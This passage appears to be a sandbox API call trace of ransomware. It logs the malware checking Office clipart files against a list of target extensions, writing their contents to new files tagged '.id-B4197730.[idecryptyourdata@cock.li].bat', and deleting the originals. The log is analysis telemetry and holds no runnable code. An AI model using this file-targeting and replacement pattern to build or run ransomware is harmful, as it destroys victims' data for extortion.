(lpString1=".7z", lpString2="WMF") returned -1 [0061.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.987] lstrlenW (lpString=".dbf") returned 4 [0061.987] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.987] lstrlenW (lpString=".1cd") returned 4 [0061.987] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 68 [0061.987] lstrlenW (lpString=".jpg") returned 4 [0061.987] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.987] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0061.987] lstrlenW (lpString="AN01060_.WMF") returned 12 [0061.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0061.988] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=7968) returned 1 [0061.988] CloseHandle (hObject=0x340) returned 1 [0061.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf")) returned 0x220 [0061.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.990] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.990] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.990] GetLastError () returned 0x0 [0061.990] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1f20, lpOverlapped=0x0) returned 1 [0062.002] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1f30, lpOverlapped=0x0) returned 1 [0062.003] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.003] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.003] SetEndOfFile (hFile=0x370) returned 1 [0062.003] CloseHandle (hObject=0x370) returned 1 [0062.004] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.004] SetEndOfFile (hFile=0x368) returned 1 [0062.005] CloseHandle (hObject=0x368) returned 1 [0062.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.005] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf")) returned 1 [0062.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.006] lstrlenW (lpString=".doc") returned 4 [0062.006] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.006] lstrlenW (lpString=".docx") returned 5 [0062.006] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.006] lstrlenW (lpString=".pdf") returned 4 [0062.006] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.006] lstrlenW (lpString=".xls") returned 4 [0062.006] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.006] lstrlenW (lpString=".xlsx") returned 5 [0062.006] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.006] lstrlenW (lpString=".ppt") returned 4 [0062.006] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.006] lstrlenW (lpString=".zip") returned 4 [0062.006] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.006] lstrlenW (lpString=".rar") returned 4 [0062.006] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.006] lstrlenW (lpString=".bz2") returned 4 [0062.006] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.006] lstrlenW (lpString=".7z") returned 3 [0062.006] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.006] lstrlenW (lpString=".dbf") returned 4 [0062.006] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.006] lstrlenW (lpString=".1cd") returned 4 [0062.007] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.007] lstrlenW (lpString=".jpg") returned 4 [0062.007] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.007] lstrlenW (lpString=".doc") returned 4 [0062.007] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.007] lstrlenW (lpString=".docx") returned 5 [0062.007] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.007] lstrlenW (lpString=".pdf") returned 4 [0062.007] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.007] lstrlenW (lpString=".xls") returned 4 [0062.007] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.007] lstrlenW (lpString=".xlsx") returned 5 [0062.007] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.007] lstrlenW (lpString=".ppt") returned 4 [0062.007] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.007] lstrlenW (lpString=".zip") returned 4 [0062.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.007] lstrlenW (lpString=".rar") returned 4 [0062.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.007] lstrlenW (lpString=".bz2") returned 4 [0062.007] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.007] lstrlenW (lpString=".7z") returned 3 [0062.007] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.007] lstrlenW (lpString=".dbf") returned 4 [0062.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.007] lstrlenW (lpString=".1cd") returned 4 [0062.007] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 68 [0062.008] lstrlenW (lpString=".jpg") returned 4 [0062.008] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.008] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.008] lstrlenW (lpString="AN01173_.WMF") returned 12 [0062.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0062.014] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=26332) returned 1 [0062.014] CloseHandle (hObject=0x350) returned 1 [0062.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf")) returned 0x220 [0062.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0062.015] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.015] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0062.015] GetLastError () returned 0x0 [0062.015] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x66dc, lpOverlapped=0x0) returned 1 [0062.043] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x66e0, lpOverlapped=0x0) returned 1 [0062.044] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.044] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.045] SetEndOfFile (hFile=0x358) returned 1 [0062.045] CloseHandle (hObject=0x358) returned 1 [0062.046] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.046] SetEndOfFile (hFile=0x350) returned 1 [0062.047] CloseHandle (hObject=0x350) returned 1 [0062.047] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.047] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf")) returned 1 [0062.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.047] lstrlenW (lpString=".doc") returned 4 [0062.047] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.047] lstrlenW (lpString=".docx") returned 5 [0062.047] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.047] lstrlenW (lpString=".pdf") returned 4 [0062.047] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.047] lstrlenW (lpString=".xls") returned 4 [0062.047] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.047] lstrlenW (lpString=".xlsx") returned 5 [0062.047] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.047] lstrlenW (lpString=".ppt") returned 4 [0062.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.048] lstrlenW (lpString=".zip") returned 4 [0062.048] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.048] lstrlenW (lpString=".rar") returned 4 [0062.048] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.048] lstrlenW (lpString=".bz2") returned 4 [0062.048] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.048] lstrlenW (lpString=".7z") returned 3 [0062.048] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.048] lstrlenW (lpString=".dbf") returned 4 [0062.048] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.048] lstrlenW (lpString=".1cd") returned 4 [0062.048] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.048] lstrlenW (lpString=".jpg") returned 4 [0062.048] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.048] lstrlenW (lpString=".doc") returned 4 [0062.048] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.048] lstrlenW (lpString=".docx") returned 5 [0062.048] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.048] lstrlenW (lpString=".pdf") returned 4 [0062.048] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.048] lstrlenW (lpString=".xls") returned 4 [0062.048] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.048] lstrlenW (lpString=".xlsx") returned 5 [0062.048] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.048] lstrlenW (lpString=".ppt") returned 4 [0062.048] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.048] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.049] lstrlenW (lpString=".zip") returned 4 [0062.049] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.049] lstrlenW (lpString=".rar") returned 4 [0062.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.049] lstrlenW (lpString=".bz2") returned 4 [0062.049] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.049] lstrlenW (lpString=".7z") returned 3 [0062.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.049] lstrlenW (lpString=".dbf") returned 4 [0062.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.049] lstrlenW (lpString=".1cd") returned 4 [0062.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 68 [0062.049] lstrlenW (lpString=".jpg") returned 4 [0062.049] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.049] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.049] lstrlenW (lpString="AN01251_.WMF") returned 12 [0062.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0062.049] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=2756) returned 1 [0062.049] CloseHandle (hObject=0x350) returned 1 [0062.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf")) returned 0x220 [0062.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0062.050] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.050] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0062.050] GetLastError () returned 0x0 [0062.050] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xac4, lpOverlapped=0x0) returned 1 [0062.066] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xad0, lpOverlapped=0x0) returned 1 [0062.719] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.719] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.719] SetEndOfFile (hFile=0x358) returned 1 [0063.302] CloseHandle (hObject=0x358) returned 1 [0063.303] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.303] SetEndOfFile (hFile=0x350) returned 1 [0063.303] CloseHandle (hObject=0x350) returned 1 [0063.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.304] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf")) returned 1 [0063.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.304] lstrlenW (lpString=".doc") returned 4 [0063.304] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.304] lstrlenW (lpString=".docx") returned 5 [0063.304] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.304] lstrlenW (lpString=".pdf") returned 4 [0063.304] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.304] lstrlenW (lpString=".xls") returned 4 [0063.304] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.304] lstrlenW (lpString=".xlsx") returned 5 [0063.304] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.304] lstrlenW (lpString=".ppt") returned 4 [0063.304] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.304] lstrlenW (lpString=".zip") returned 4 [0063.304] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.304] lstrlenW (lpString=".rar") returned 4 [0063.304] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.304] lstrlenW (lpString=".bz2") returned 4 [0063.305] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString=".7z") returned 3 [0063.305] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.305] lstrlenW (lpString=".dbf") returned 4 [0063.305] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.305] lstrlenW (lpString=".1cd") returned 4 [0063.305] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.305] lstrlenW (lpString=".jpg") returned 4 [0063.305] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.305] lstrlenW (lpString=".doc") returned 4 [0063.305] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString=".docx") returned 5 [0063.305] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.305] lstrlenW (lpString=".pdf") returned 4 [0063.305] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString=".xls") returned 4 [0063.305] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.305] lstrlenW (lpString=".xlsx") returned 5 [0063.305] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.305] lstrlenW (lpString=".ppt") returned 4 [0063.305] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.305] lstrlenW (lpString=".zip") returned 4 [0063.305] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.305] lstrlenW (lpString=".rar") returned 4 [0063.305] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString=".bz2") returned 4 [0063.305] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.305] lstrlenW (lpString=".7z") returned 3 [0063.305] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.306] lstrlenW (lpString=".dbf") returned 4 [0063.306] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.306] lstrlenW (lpString="C:\\Program Files\\Microsoft 